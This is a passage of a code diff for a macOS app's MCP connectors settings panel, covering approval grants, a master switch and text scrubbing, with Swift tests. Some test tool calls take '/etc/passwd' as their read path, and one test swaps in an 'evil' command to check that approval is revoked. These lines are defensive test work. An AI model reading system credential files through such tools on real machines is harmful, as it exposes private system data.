+                    .accessibilityIdentifier("Settings.Connectors.AutoApproveToggle")
+
+                    Divider()
+
+                    HStack(alignment: .firstTextBaseline) {
+                        VStack(alignment: .leading, spacing: 2) {
+                            Text(approval.grantedTools.isEmpty
+                                ? "No tools are permanently allowed."
+                                : "\(approval.grantedTools.count) tool\(approval.grantedTools.count == 1 ? "" : "s") permanently allowed.")
+                                .font(.callout)
+                            Text("Resetting makes Rapid ask again the next time each one is called.")
+                                .font(.caption)
+                                .foregroundStyle(.secondary)
+                        }
+                        Spacer()
+                        Button("Reset") { approval.resetGrants() }
+                            .disabled(approval.grantedTools.isEmpty)
+                            .accessibilityIdentifier("Settings.Connectors.ResetApprovals")
+                    }
+                }
+            }
+        }
+    }
+
+    // MARK: - Actions
+
+    private func save(_ updated: MCPServerConfig, replacing originalName: String?) {
+        do {
+            try config.upsert(updated, replacing: originalName)
+            editing = nil
+            actionError = nil
+            applyChange()
+        } catch {
+            actionError = error.localizedDescription
+        }
+    }
+
+    private func remove(_ entry: MCPServerConfig) {
+        do {
+            try config.remove(named: entry.name)
+            actionError = nil
+            applyChange()
+        } catch {
+            actionError = error.localizedDescription
+        }
+    }
+
+    private func setEnabled(_ entry: MCPServerConfig, _ enabled: Bool) {
+        do {
+            try config.setServerEnabled(entry.name, enabled)
+            actionError = nil
+            applyChange()
+        } catch {
+            actionError = error.localizedDescription
+        }
+    }
+
+    /// Push a config edit through to the running engine.
+    ///
+    /// Issue #1716 acceptance item 4: apply without a restart, or say so.
+    /// ``MCPCatalog/reload()`` hits the engine's reload route so an edit takes
+    /// effect immediately. When it can't — engine not running, no config path
+    /// (child predates the master switch), or an older build with no reload
+    /// route — the reload leaves `catalog.isConfigured` false and the derived
+    /// ``needsRestart`` raises the banner. Nothing is recorded here, so the
+    /// banner survives a tab switch.
+    private func applyChange() {
+        // Nothing running means the next spawn picks the file up anyway.
+        guard server.launchedChildAlias != nil else { return }
+        Task { await catalog.reload() }
+    }
+
+    // MARK: - Chrome
+
+    private func header(_ title: String, _ subtitle: String) -> some View {
+        VStack(alignment: .leading, spacing: 4) {
+            Text(title)
+                .font(.title3.weight(.semibold))
+            Text(subtitle)
+                .font(.callout)
+                .foregroundStyle(.secondary)
+                .fixedSize(horizontal: false, vertical: true)
+        }
+    }
+
+    private func banner(_ text: String, systemImage: String, tone: Color) -> some View {
+        HStack(alignment: .top, spacing: 8) {
+            Image(systemName: systemImage).foregroundStyle(tone)
+            Text(text)
+                .font(.caption)
+                .fixedSize(horizontal: false, vertical: true)
+            Spacer()
+        }
+        .padding(10)
+        .background(RoundedRectangle(cornerRadius: 8).fill(tone.opacity(0.12)))
+    }
+
+    @ViewBuilder
+    private func card<Content: View>(@ViewBuilder _ content: () -> Content) -> some View {
+        content()
+            .frame(maxWidth: .infinity, alignment: .leading)
+            .padding(16)
+            .background(
+                RoundedRectangle(cornerRadius: RapidTheme.cardRadius, style: .continuous)
+                    .fill(RapidTheme.card)
+            )
+            .clipShape(RoundedRectangle(cornerRadius: RapidTheme.cardRadius, style: .continuous))
+            .overlay(
+                RoundedRectangle(cornerRadius: RapidTheme.cardRadius, style: .continuous)
+                    .stroke(RapidTheme.hairline, lineWidth: 1)
+            )
+    }
+}
+
+extension MCPServerConfig {
+    /// One-line "what is this" for the server row — the command that will run,
+    /// or the URL that will be contacted.
+    var summaryLine: String {
+        switch transport {
+        case .stdio:
+            let parts = ([command ?? ""] + args).filter { !$0.isEmpty }
+            return parts.joined(separator: " ")
+        case .sse:
+            return url ?? ""
+        }
+    }
+}

--- a/apps/rapid-mac/Sources/Rapid/UI/SettingsConnectorsPanel.swift
+++ b/apps/rapid-mac/Sources/Rapid/UI/SettingsConnectorsPanel.swift
@@ -40,7 +40,12 @@ struct SettingsConnectorsPanel: View {
     /// MCP config — which is exactly what happens when it was spawned before
     /// connectors were switched on, since `--mcp-config` is read once at spawn.
     private var needsRestart: Bool {
+        // Requires at least one ENABLED server: with none, `launchConfigPath`
+        // intentionally stays nil (nothing to start the subsystem for), so the
+        // child is correctly unconfigured and a restart could never change
+        // that — showing a restart banner it can't clear.
         config.isEnabled
+            && config.servers.contains(where: { $0.enabled })
             && server.launchedChildAlias != nil
             && !catalog.isConfigured
     }

--- a/apps/rapid-mac/Sources/Rapid/UI/SettingsConnectorsPanel.swift
+++ b/apps/rapid-mac/Sources/Rapid/UI/SettingsConnectorsPanel.swift
@@ -250,7 +250,10 @@ struct SettingsConnectorsPanel: View {
     /// panel exists to answer.
     private func statusLine(for entry: MCPServerConfig, status: MCPCatalog.ServerStatus?) -> String {
         if !entry.enabled { return "Turned off" }
-        if let error = status?.error { return error }
+        // The engine's error string can carry a connector's own stderr, so
+        // scrub it the same way the tool rows and approval sheet scrub server
+        // text — a bidi/zero-width scalar must not spoof this status line.
+        if let error = status?.error { return BrowseApprovalStore.displaySafe(error) }
         if let status {
             if status.isConnected {
                 let n = status.toolsCount

--- a/apps/rapid-mac/Sources/Rapid/UI/SettingsConnectorsPanel.swift
+++ b/apps/rapid-mac/Sources/Rapid/UI/SettingsConnectorsPanel.swift
@@ -343,10 +343,14 @@ struct SettingsConnectorsPanel: View {
                     .frame(width: 18)
                 VStack(alignment: .leading, spacing: 2) {
                     HStack(spacing: 6) {
-                        Text(MCPToolApprovalStore.shortToolName(name))
+                        // Server-supplied text (tool name, owning server,
+                        // description) is scrubbed the same way the approval
+                        // sheet scrubs it — a bidi or zero-width scalar in a
+                        // server's tool metadata must not visually spoof a row.
+                        Text(BrowseApprovalStore.displaySafe(MCPToolApprovalStore.shortToolName(name)))
                             .font(.system(size: 12, weight: .medium, design: .monospaced))
                         if let source = catalog.serverForTool[name] {
-                            Text(source)
+                            Text(BrowseApprovalStore.displaySafe(source))
                                 .font(.system(size: 10, weight: .medium))
                                 .padding(.horizontal, 5)
                                 .padding(.vertical, 1)
@@ -358,7 +362,7 @@ struct SettingsConnectorsPanel: View {
                                 .foregroundStyle(.secondary)
                         }
                     }
-                    Text(def.function.description)
+                    Text(BrowseApprovalStore.displaySafe(def.function.description))
                         .font(.caption)
                         .foregroundStyle(.secondary)
                         .fixedSize(horizontal: false, vertical: true)

--- a/apps/rapid-mac/Sources/Rapid/UI/SettingsToolsPanel.swift
+++ b/apps/rapid-mac/Sources/Rapid/UI/SettingsToolsPanel.swift
@@ -47,7 +47,7 @@ struct SettingsToolsPanel: View {
             )
             card {
                 VStack(alignment: .leading, spacing: 12) {
-                    ForEach(chat.tools.definitions, id: \.function.name) { def in
+                    ForEach(chat.builtinDefinitions, id: \.function.name) { def in
                         Toggle(isOn: toolBinding(def.function.name)) {
                             HStack(alignment: .top, spacing: 10) {
                                 Image(systemName: Self.glyph(for: def.function.name))

--- a/apps/rapid-mac/Sources/Rapid/UI/SettingsView.swift
+++ b/apps/rapid-mac/Sources/Rapid/UI/SettingsView.swift
@@ -75,6 +75,12 @@ struct SettingsView: View {
         /// Built-in tools the model can call: on/off per tool, the
         /// web-search backend + key, and the browse approval mode.
         case tools
+        /// Issue #1716 — MCP connectors: which servers the engine runs, the
+        /// tools they expose, and the per-tool consent record. Separate from
+        /// ``tools`` because the two are different in kind: built-in tools
+        /// ship with the app and are audited by us, connectors are programs
+        /// the user installs and points us at.
+        case connectors
         case appearance
         case privacy
         /// Rapid-MLX Desktop app updates. The .app self-update is the
@@ -86,6 +92,7 @@ struct SettingsView: View {
             switch self {
             case .modelManagement: return "Model Management"
             case .tools: return "Tools"
+            case .connectors: return "Connectors"
             case .appearance: return "Appearance"
             case .privacy: return "Privacy"
             case .app: return "App"
@@ -95,6 +102,7 @@ struct SettingsView: View {
             switch self {
             case .modelManagement: return "externaldrive.fill"
             case .tools: return "wrench.and.screwdriver.fill"
+            case .connectors: return "powerplug.fill"
             case .appearance: return "paintpalette.fill"
             case .privacy: return "lock.shield.fill"
             case .app: return "app.badge.fill"
@@ -353,6 +361,8 @@ struct SettingsView: View {
             SettingsModelManagementPanel()
         case .tools:
             SettingsToolsPanel()
+        case .connectors:
+            SettingsConnectorsPanel()
         case .appearance:
             appearancePanel
         case .privacy:

--- a/apps/rapid-mac/Tests/RapidTests/AccessibilityIdentifierInventoryTests.swift
+++ b/apps/rapid-mac/Tests/RapidTests/AccessibilityIdentifierInventoryTests.swift
@@ -93,6 +93,72 @@ struct AccessibilityIdentifierInventoryTests {
         )
     }
 
+    // MARK: - Settings → Connectors (issue #1716)
+
+    /// The connector surface is where a user authorises a program on their Mac
+    /// to be driven by a model, so every control on it has to be reachable by
+    /// the golden-flow harness — not just the happy-path ones.
+    @Test("Settings → Connectors names every control it offers")
+    func settingsConnectorsPanelIdentifiers() throws {
+        try assertDeclared(
+            [
+                #""Settings.Connectors.MasterToggle""#,
+                #""Settings.Connectors.AddButton""#,
+                #""Settings.Connectors.SubsystemError""#,
+                #""Settings.Connectors.RestartButton""#,
+                #""Settings.Connectors.ConfirmRemove""#,
+                #""Settings.Connectors.CancelRemove""#,
+                // Per-server rows, keyed on the server's name — which is also
+                // the namespace half of every tool it exposes, not display text.
+                #""Settings.Connectors.Row.Status.\(entry.name)""#,
+                #""Settings.Connectors.Row.Toggle.\(entry.name)""#,
+                #""Settings.Connectors.Row.Menu.\(entry.name)""#,
+                #""Settings.Connectors.Row.Edit.\(entry.name)""#,
+                #""Settings.Connectors.Row.Remove.\(entry.name)""#,
+                // Per-tool switch, keyed on the namespaced wire name.
+                #""Settings.Connectors.Tool.Toggle.\(name)""#,
+                #""Settings.Connectors.AutoApproveToggle""#,
+                #""Settings.Connectors.ResetApprovals""#,
+            ],
+            in: "Sources/Rapid/UI/SettingsConnectorsPanel.swift",
+            surface: "Settings → Connectors"
+        )
+    }
+
+    @Test("The connector editor sheet names every field")
+    func mcpServerEditorSheetIdentifiers() throws {
+        try assertDeclared(
+            [
+                #""Settings.Connectors.Editor.Name""#,
+                #""Settings.Connectors.Editor.Transport""#,
+                #""Settings.Connectors.Editor.Command""#,
+                #""Settings.Connectors.Editor.URL""#,
+                #""Settings.Connectors.Editor.AddArgument""#,
+                #""Settings.Connectors.Editor.AddEnv""#,
+                #""Settings.Connectors.Editor.Enabled""#,
+                #""Settings.Connectors.Editor.Allow""#,
+                #""Settings.Connectors.Editor.Cancel""#,
+            ],
+            in: "Sources/Rapid/UI/MCPServerEditorSheet.swift",
+            surface: "Settings → Connectors → editor"
+        )
+    }
+
+    /// The consent prompt is the last thing standing between a model and a
+    /// program on the user's Mac. Its three buttons must be addressable.
+    @Test("The MCP tool approval sheet names its three decisions")
+    func mcpApprovalSheetIdentifiers() throws {
+        try assertDeclared(
+            [
+                #""ToolApproval.MCP.Deny""#,
+                #""ToolApproval.MCP.AlwaysAllow""#,
+                #""ToolApproval.MCP.Allow""#,
+            ],
+            in: "Sources/Rapid/UI/ContentView.swift",
+            surface: "MCP tool approval sheet"
+        )
+    }
+
     /// Behaviour guard for the constraint the identifiers ride on: a settings
     /// switch must stay a REAL `Toggle` with the native `.switch` style, so it
     /// keeps reporting `AXCheckBox` with a value that tracks state and flips

--- a/apps/rapid-mac/Tests/RapidTests/MCPConnectorsTests.swift
+++ b/apps/rapid-mac/Tests/RapidTests/MCPConnectorsTests.swift
@@ -31,6 +31,16 @@ final class MCPConnectorsTests {
         return d
     }
 
+    /// Fresh defaults with the connectors master switch already on. The
+    /// registry gates advertise + dispatch on that switch, so a test about the
+    /// per-tool or approval gates has to start from "connectors on" or it would
+    /// only ever exercise the master gate.
+    private func enabledDefaults() -> UserDefaults {
+        let d = freshDefaults()
+        d.set(true, forKey: MCPConfigStore.enabledKey)
+        return d
+    }
+
     private func tempConfigURL() -> URL {
         let dir = FileManager.default.temporaryDirectory
             .appendingPathComponent("rapid-mcp-\(UUID().uuidString)", isDirectory: true)
@@ -107,6 +117,24 @@ final class MCPConnectorsTests {
         #expect(remote.url == "https://example.com/mcp")
         // A URL entry must not carry a stale command from an earlier edit.
         #expect(remote.command == nil)
+    }
+
+    @Test("An imported config with an uncallable server name surfaces a load error")
+    func importedInvalidNameSurfacesOnLoad() throws {
+        // Validation is enforced on the write path, but an imported config —
+        // the whole reason for the ecosystem-standard shape — never went
+        // through it. `my.server` is a legal JSON key yet an illegal tool-name
+        // namespace, so the engine would forward it and the model would
+        // silently never call it. The load has to say so.
+        let url = tempConfigURL()
+        try FileManager.default.createDirectory(
+            at: url.deletingLastPathComponent(), withIntermediateDirectories: true
+        )
+        try Data(#"{"mcpServers":{"my.server":{"command":"npx"}}}"#.utf8).write(to: url)
+
+        let store = MCPConfigStore(defaults: freshDefaults(), fileURL: url)
+        #expect(store.loadError != nil)
+        #expect(store.loadError?.contains("my.server") == true)
     }
 
     @Test("A hand-written entry with no transport decodes as stdio rather than failing")
@@ -351,7 +379,7 @@ final class MCPConnectorsTests {
         let registry = MCPToolRegistry(
             catalog: makeCatalog(),
             approval: makeApproval(),
-            defaults: freshDefaults()
+            defaults: enabledDefaults()
         )
         registry.setToolEnabled("fs__read_file", false)
         #expect(!registry.isToolEnabled("fs__read_file"))
@@ -381,7 +409,7 @@ final class MCPConnectorsTests {
         let registry = MCPToolRegistry(
             catalog: makeCatalog(),
             approval: approval,
-            defaults: freshDefaults()
+            defaults: enabledDefaults()
         )
         async let result = registry.run(
             ToolCall(id: "c1", name: "fs__read_file", arguments: #"{"path":"/etc/passwd"}"#)
@@ -414,6 +442,44 @@ final class MCPConnectorsTests {
         #expect(pending?.argumentsPreview.contains("\u{202E}") == false)
         approval.answer(.deny)
         _ = await decision
+    }
+
+    @Test("The master switch gates advertise + dispatch even with a populated catalog")
+    func masterSwitchGatesConnectorTools() async {
+        // The running child keeps its connectors loaded until it restarts, so a
+        // later `/healthz` ready transition can repopulate the catalog after
+        // the user switched connectors off. The load-bearing gate is on the
+        // registry the chat loop reads — not the catalog it can refill from.
+        let (catalog, port) = stubbedCatalog()
+        MCPStubProtocol.responses[key(port, "/v1/mcp/servers")] = """
+        {"servers":[{"name":"fs","state":"connected","transport":"stdio","tools_count":1,"error":null}],
+         "error":null,"configured":true}
+        """
+        MCPStubProtocol.responses[key(port, "/v1/mcp/tools")] = """
+        {"tools":[{"name":"fs__read_file","description":"d","server":"fs","parameters":{}}],"count":1}
+        """
+        await catalog.refresh()
+        #expect(!catalog.tools.isEmpty)
+
+        let defaults = enabledDefaults()
+        let registry = MCPToolRegistry(
+            catalog: catalog, approval: makeApproval(), defaults: defaults
+        )
+        // Connectors on: the populated tool is advertised.
+        #expect(registry.definitions.map { $0.function.name } == ["fs__read_file"])
+
+        // Flip the master switch off. The catalog is still populated (no
+        // restart yet), but the tool must vanish from what the model sees AND
+        // be refused if a call slips through anyway.
+        defaults.set(false, forKey: MCPConfigStore.enabledKey)
+        #expect(registry.definitions.isEmpty)
+
+        let result = await registry.run(
+            ToolCall(id: "c1", name: "fs__read_file", arguments: "{}")
+        )
+        #expect(result.isError)
+        #expect(result.failureKind == .userDeclined)
+        #expect(result.content.contains("Connectors are turned off"))
     }
 
     // MARK: - Composite registry
@@ -557,6 +623,27 @@ final class MCPConnectorsTests {
         #expect(catalog.tools.map { $0.function.name } == ["time__get_current_time"])
     }
 
+    @Test("A reload whose tool re-fetch fails reports failure, not success")
+    func reloadReportsToolRefetchFailure() async {
+        // The reload route answered and reconfigured the engine, but the
+        // follow-up tools fetch failed. Reporting success here would leave the
+        // caller believing the catalog reflects the new config while it still
+        // holds the pre-reload tool list — the stale-advertise trap.
+        let (catalog, port) = stubbedCatalog()
+        MCPStubProtocol.responses[key(port, "/v1/mcp/reload")] = """
+        {"servers":[{"name":"time","state":"connected","transport":"stdio","tools_count":1,"error":null}],
+         "error":null,"configured":true}
+        """
+        MCPStubProtocol.responses[key(port, "/v1/mcp/servers")] = """
+        {"servers":[{"name":"time","state":"connected","transport":"stdio","tools_count":1,"error":null}],
+         "error":null,"configured":true}
+        """
+        MCPStubProtocol.statusCodes[key(port, "/v1/mcp/tools")] = 503
+        let applied = await catalog.reload()
+        #expect(!applied, "a reload that couldn't refresh the tool list is not a success")
+        #expect(catalog.fetchError != nil)
+    }
+
     @Test("A reload against an engine with no reload route reports failure")
     func reloadAgainstOlderEngineIsNotSuccess() async {
         let (catalog, port) = stubbedCatalog()
@@ -604,8 +691,10 @@ final class MCPConnectorsTests {
         #expect(catalog.tools.isEmpty)
         #expect(catalog.serverForTool.isEmpty)
 
+        // Connectors ON so the empty result is attributable to `clear()`, not
+        // to the master gate — otherwise the assertion would hold vacuously.
         let registry = MCPToolRegistry(
-            catalog: catalog, approval: makeApproval(), defaults: freshDefaults()
+            catalog: catalog, approval: makeApproval(), defaults: enabledDefaults()
         )
         #expect(registry.definitions.isEmpty)
     }

--- a/apps/rapid-mac/Tests/RapidTests/MCPConnectorsTests.swift
+++ b/apps/rapid-mac/Tests/RapidTests/MCPConnectorsTests.swift
@@ -404,6 +404,27 @@ final class MCPConnectorsTests {
         #expect(!approval.isGranted("fs__read_file"))
     }
 
+    @Test("A hand-edited command is caught by the launch reconcile and revokes the grant")
+    func handEditRevokesGrantOnReconcile() {
+        let defaults = freshDefaults()
+        defaults.set(true, forKey: MCPToolApprovalStore.grantKey("fs__read_file"))
+        let approval = MCPToolApprovalStore(defaults: defaults)
+
+        // First launch establishes the baseline fingerprint for "fs" = npx.
+        let original = MCPServerConfig(name: "fs", command: "npx")
+        approval.reconcileGrants(against: ["fs": original.executionFingerprint])
+        #expect(approval.isGranted("fs__read_file"), "unchanged code keeps the grant")
+
+        // A relaunch with the same fingerprint keeps it too.
+        approval.reconcileGrants(against: ["fs": original.executionFingerprint])
+        #expect(approval.isGranted("fs__read_file"))
+
+        // Next launch after the config file was hand-edited to a new command.
+        let edited = MCPServerConfig(name: "fs", command: "evil")
+        approval.reconcileGrants(against: ["fs": edited.executionFingerprint])
+        #expect(!approval.isGranted("fs__read_file"))
+    }
+
     @Test("Auto-approve mode skips the prompt entirely")
     func autoApproveSkipsPrompt() async {
         let store = makeApproval()
@@ -747,21 +768,25 @@ final class MCPConnectorsTests {
         #expect(catalog.tools.map { $0.function.name } == ["time__get_current_time"])
     }
 
-    @Test("A tool whose namespaced name exceeds the 64-char function limit is dropped")
-    func overlongToolNameIsNotAdvertised() async {
+    @Test("A tool whose namespaced name isn't a legal function name is dropped")
+    func illegalToolNameIsNotAdvertised() async {
         let (catalog, port) = stubbedCatalog()
         let longName = "srv__" + String(repeating: "x", count: 70)  // 75 > 64
         MCPStubProtocol.responses[key(port, "/v1/mcp/servers")] =
             #"{"servers":[],"error":null,"configured":true}"#
+        // Three tools: legal, too long, and with a space (both illegal in an
+        // OpenAI function name). Only the legal one survives.
         MCPStubProtocol.responses[key(port, "/v1/mcp/tools")] = """
         {"tools":[{"name":"srv__ok","description":"d","server":"srv","parameters":{}},
-                  {"name":"\(longName)","description":"d","server":"srv","parameters":{}}],"count":2}
+                  {"name":"\(longName)","description":"d","server":"srv","parameters":{}},
+                  {"name":"srv__has space","description":"d","server":"srv","parameters":{}}],"count":3}
         """
         await catalog.refresh()
-        // The over-long one can't be a legal OpenAI function name, so it is not
-        // offered rather than advertised as a tool the model can never call.
+        // The illegal ones can't be emitted by the model, so they are not
+        // offered rather than advertised as tools it can never call.
         #expect(catalog.tools.map { $0.function.name } == ["srv__ok"])
         #expect(catalog.serverForTool[longName] == nil)
+        #expect(catalog.serverForTool["srv__has space"] == nil)
     }
 
     @Test("A reload whose tool re-fetch fails reports failure, not success")

--- a/apps/rapid-mac/Tests/RapidTests/MCPConnectorsTests.swift
+++ b/apps/rapid-mac/Tests/RapidTests/MCPConnectorsTests.swift
@@ -1,0 +1,638 @@
+import Foundation
+import Testing
+@testable import Rapid
+
+/// Issue #1716 — MCP went from engine-complete-and-app-invisible to a real
+/// desktop surface. These pin the parts that are load-bearing for safety:
+///
+///   * the config the app writes is the shape the engine reads, and a name
+///     that would produce an uncallable tool never reaches it;
+///   * a disabled tool is refused at dispatch, not merely omitted from the
+///     request body;
+///   * a tool that was never approved does not execute;
+///   * built-in tools keep their own switch and cannot be shadowed by a
+///     connector claiming their name.
+@MainActor
+@Suite("MCP connectors (issue #1716)")
+final class MCPConnectorsTests {
+    nonisolated(unsafe) private var createdSuiteNames: [String] = []
+    nonisolated(unsafe) private var tempDirs: [URL] = []
+
+    deinit {
+        TestDefaultsScope.cleanup(suiteNames: createdSuiteNames)
+        for dir in tempDirs { try? FileManager.default.removeItem(at: dir) }
+    }
+
+    private func freshDefaults() -> UserDefaults {
+        let name = TestDefaultsScope.mintSuiteName(prefix: "rapid-mcp-test-")
+        createdSuiteNames.append(name)
+        let d = UserDefaults(suiteName: name)!
+        d.removePersistentDomain(forName: name)
+        return d
+    }
+
+    private func tempConfigURL() -> URL {
+        let dir = FileManager.default.temporaryDirectory
+            .appendingPathComponent("rapid-mcp-\(UUID().uuidString)", isDirectory: true)
+        tempDirs.append(dir)
+        return dir.appendingPathComponent("mcp.json")
+    }
+
+    // MARK: - Server name validation
+
+    @Test("A server name that would produce an uncallable tool name is rejected")
+    func nameValidation() {
+        // The engine namespaces tools as `server__tool`, and that composite
+        // travels as an OpenAI function name — `[a-zA-Z0-9_-]`, max 64. A
+        // space here means the model is handed a name it can never emit, and
+        // the symptom is "that connector's tools are silently ignored".
+        #expect(MCPServerConfig.isValidName("filesystem"))
+        #expect(MCPServerConfig.isValidName("my-server_2"))
+        #expect(!MCPServerConfig.isValidName("my server"))
+        #expect(!MCPServerConfig.isValidName("emoji🙂"))
+        #expect(!MCPServerConfig.isValidName("dots.are.out"))
+        #expect(!MCPServerConfig.isValidName(""))
+        #expect(!MCPServerConfig.isValidName(String(repeating: "a", count: 33)))
+    }
+
+    @Test("A stdio entry needs a command and an SSE entry needs a valid URL")
+    func transportValidation() {
+        var stdio = MCPServerConfig(name: "ok", transport: .stdio, command: nil)
+        #expect(stdio.validationError != nil)
+        stdio.command = "uvx"
+        #expect(stdio.validationError == nil)
+
+        var sse = MCPServerConfig(name: "ok", transport: .sse, url: nil)
+        #expect(sse.validationError != nil)
+        sse.url = "ftp://example.com"
+        #expect(sse.validationError != nil, "only http/https should pass")
+        sse.url = "https://example.com/mcp"
+        #expect(sse.validationError == nil)
+    }
+
+    // MARK: - Config file round-trip
+
+    @Test("Config round-trips through the ecosystem-standard mcpServers shape")
+    func configRoundTrip() throws {
+        let store = MCPConfigStore(defaults: freshDefaults(), fileURL: tempConfigURL())
+        try store.upsert(MCPServerConfig(
+            name: "time",
+            transport: .stdio,
+            command: "uvx",
+            args: ["mcp-server-time", "--local-timezone=UTC"],
+            env: ["TZ": "UTC"]
+        ))
+        try store.upsert(MCPServerConfig(
+            name: "remote",
+            transport: .sse,
+            url: "https://example.com/mcp"
+        ))
+
+        let data = try MCPConfigStore.encode(store.servers)
+        // The engine reads `mcpServers` (and so do Claude Desktop / VS Code),
+        // so a config authored here must be liftable into any of them.
+        let root = try JSONSerialization.jsonObject(with: data) as? [String: Any]
+        let map = root?["mcpServers"] as? [String: Any]
+        #expect(map?.count == 2)
+        #expect(map?["time"] != nil)
+
+        let decoded = try MCPConfigStore.decode(data)
+        #expect(decoded.map(\.name) == ["remote", "time"], "sorted for a stable list")
+        let time = try #require(decoded.first { $0.name == "time" })
+        #expect(time.command == "uvx")
+        #expect(time.args == ["mcp-server-time", "--local-timezone=UTC"])
+        #expect(time.env == ["TZ": "UTC"])
+        let remote = try #require(decoded.first { $0.name == "remote" })
+        #expect(remote.transport == .sse)
+        #expect(remote.url == "https://example.com/mcp")
+        // A URL entry must not carry a stale command from an earlier edit.
+        #expect(remote.command == nil)
+    }
+
+    @Test("A hand-written entry with no transport decodes as stdio rather than failing")
+    func decodeToleratesMissingTransport() throws {
+        // Refusing to decode would drop the entry from the UI entirely, which
+        // is the exact "my connectors vanished" failure this feature fixes.
+        let json = #"{"mcpServers":{"fs":{"command":"npx","args":["-y","pkg"]}}}"#
+        let decoded = try MCPConfigStore.decode(Data(json.utf8))
+        #expect(decoded.count == 1)
+        #expect(decoded[0].name == "fs")
+        #expect(decoded[0].transport == .stdio)
+        #expect(decoded[0].enabled, "absent `enabled` means enabled")
+    }
+
+    @Test("The engine's historical `servers` key still loads")
+    func decodeAcceptsLegacyKey() throws {
+        let json = #"{"servers":{"fs":{"transport":"stdio","command":"npx"}}}"#
+        let decoded = try MCPConfigStore.decode(Data(json.utf8))
+        #expect(decoded.map(\.name) == ["fs"])
+    }
+
+    @Test("A duplicate name is refused rather than silently overwriting")
+    func duplicateNameRefused() throws {
+        let store = MCPConfigStore(defaults: freshDefaults(), fileURL: tempConfigURL())
+        try store.upsert(MCPServerConfig(name: "fs", command: "npx"))
+        #expect(throws: MCPConfigStore.SaveError.self) {
+            try store.upsert(MCPServerConfig(name: "fs", command: "uvx"))
+        }
+        // Editing that same entry must still work — the duplicate check is
+        // against OTHER entries, not the one being replaced.
+        try store.upsert(MCPServerConfig(name: "fs", command: "uvx"), replacing: "fs")
+        #expect(store.servers.first?.command == "uvx")
+    }
+
+    @Test("The config file is written 0600")
+    func configFilePermissions() throws {
+        let url = tempConfigURL()
+        let store = MCPConfigStore(defaults: freshDefaults(), fileURL: url)
+        try store.upsert(MCPServerConfig(name: "fs", command: "npx"))
+        // The file names local commands that the engine will execute. Another
+        // account on a shared Mac must not be able to read — let alone edit —
+        // it. `.atomic` writes via rename and does NOT carry permissions, so
+        // this pins the explicit chmod after the rename.
+        let attrs = try FileManager.default.attributesOfItem(atPath: url.path)
+        let perms = try #require(attrs[.posixPermissions] as? NSNumber)
+        #expect(perms.intValue == 0o600)
+    }
+
+    // MARK: - Launch flag
+
+    @Test("--mcp-config is passed only when connectors are on AND a server is enabled")
+    func launchConfigPathGate() throws {
+        let store = MCPConfigStore(defaults: freshDefaults(), fileURL: tempConfigURL())
+
+        // Off by default: connectors run arbitrary local programs, so the
+        // subsystem stays entirely absent until asked for.
+        #expect(!store.isEnabled)
+        #expect(store.launchConfigPath == nil)
+
+        store.isEnabled = true
+        #expect(store.launchConfigPath == nil, "enabled but no servers is still nothing to start")
+
+        try store.upsert(MCPServerConfig(name: "fs", command: "npx"))
+        #expect(store.launchConfigPath != nil)
+
+        try store.setServerEnabled("fs", false)
+        #expect(store.launchConfigPath == nil, "every server switched off is nothing to start")
+
+        try store.setServerEnabled("fs", true)
+        store.isEnabled = false
+        #expect(store.launchConfigPath == nil, "master switch wins")
+    }
+
+    @Test("serveArguments appends --mcp-config last, after the cors-origins nargs list")
+    func serveArgumentsCarriesMCPConfig() throws {
+        let argv = ServerManager.serveArguments(
+            alias: "qwen3.5-4b-4bit",
+            host: "127.0.0.1",
+            port: 8000,
+            mcpConfigPath: "/tmp/mcp.json"
+        )
+        // ``--cors-origins`` is argparse ``nargs="+"``; only a following
+        // ``--``-prefixed flag terminates its collection. If ``--mcp-config``
+        // ever stopped starting with ``--`` (or a bare value were appended
+        // after it) the path would be swallowed as a third CORS origin.
+        let idx = try #require(argv.firstIndex(of: "--mcp-config"))
+        #expect(argv[idx + 1] == "/tmp/mcp.json")
+        #expect(idx == argv.count - 2, "the path is the final argv element")
+        let corsIdx = try #require(argv.firstIndex(of: "--cors-origins"))
+        #expect(corsIdx < idx)
+    }
+
+    @Test("serveArguments is unchanged when no MCP config path is supplied")
+    func serveArgumentsOmitsMCPConfigByDefault() {
+        // A user who never turns connectors on must get the exact pre-#1716
+        // argv — no new flag, no behaviour change.
+        let argv = ServerManager.serveArguments(
+            alias: "qwen3.5-4b-4bit",
+            host: "127.0.0.1",
+            port: 8000
+        )
+        #expect(!argv.contains("--mcp-config"))
+        #expect(argv == [
+            "serve",
+            "qwen3.5-4b-4bit",
+            "--host", "127.0.0.1",
+            "--port", "8000",
+            "--cors-origins", "http://127.0.0.1", "http://localhost",
+        ])
+    }
+
+    // MARK: - Approval gate
+
+    private func makeApproval() -> MCPToolApprovalStore {
+        MCPToolApprovalStore(defaults: freshDefaults())
+    }
+
+    @Test("Always-allow is remembered for that tool and no other")
+    func grantIsPerTool() async {
+        let store = makeApproval()
+        #expect(!store.isGranted("fs__read_file"))
+
+        async let decision = store.requestApproval(
+            toolName: "fs__read_file",
+            serverName: "fs",
+            argumentsJSON: #"{"path":"/etc/hosts"}"#
+        )
+        try? await Task.sleep(nanoseconds: 20_000_000)
+        store.answer(.alwaysAllowTool)
+        let answered = await decision
+        #expect(answered == .alwaysAllowTool)
+
+        #expect(store.isGranted("fs__read_file"))
+        // The point of per-tool consent: approving one tool must not hand out
+        // the rest of that server's surface.
+        #expect(!store.isGranted("fs__write_file"))
+        #expect(!store.isGranted("shell__run"))
+
+        // A granted tool no longer prompts.
+        let second = await store.requestApproval(
+            toolName: "fs__read_file", serverName: "fs", argumentsJSON: "{}"
+        )
+        #expect(second == .allowOnce)
+    }
+
+    @Test("Allow-once does not persist")
+    func allowOnceIsNotRemembered() async {
+        let store = makeApproval()
+        async let decision = store.requestApproval(
+            toolName: "fs__read_file", serverName: "fs", argumentsJSON: "{}"
+        )
+        try? await Task.sleep(nanoseconds: 20_000_000)
+        store.answer(.allowOnce)
+        _ = await decision
+        #expect(!store.isGranted("fs__read_file"))
+    }
+
+    @Test("Reset revokes every remembered grant but leaves the auto-approve mode alone")
+    func resetGrants() async {
+        let defaults = freshDefaults()
+        let store = MCPToolApprovalStore(defaults: defaults)
+        store.mode = .autoApproveAll
+        defaults.set(true, forKey: MCPToolApprovalStore.grantKey("fs__read_file"))
+
+        let reloaded = MCPToolApprovalStore(defaults: defaults)
+        #expect(reloaded.grantedTools.contains("fs__read_file"), "grants survive a relaunch")
+        reloaded.resetGrants()
+        #expect(reloaded.grantedTools.isEmpty)
+        #expect(defaults.object(forKey: MCPToolApprovalStore.grantKey("fs__read_file")) == nil)
+        // Resetting individual grants is not a request to change the global
+        // posture — that's a separate switch.
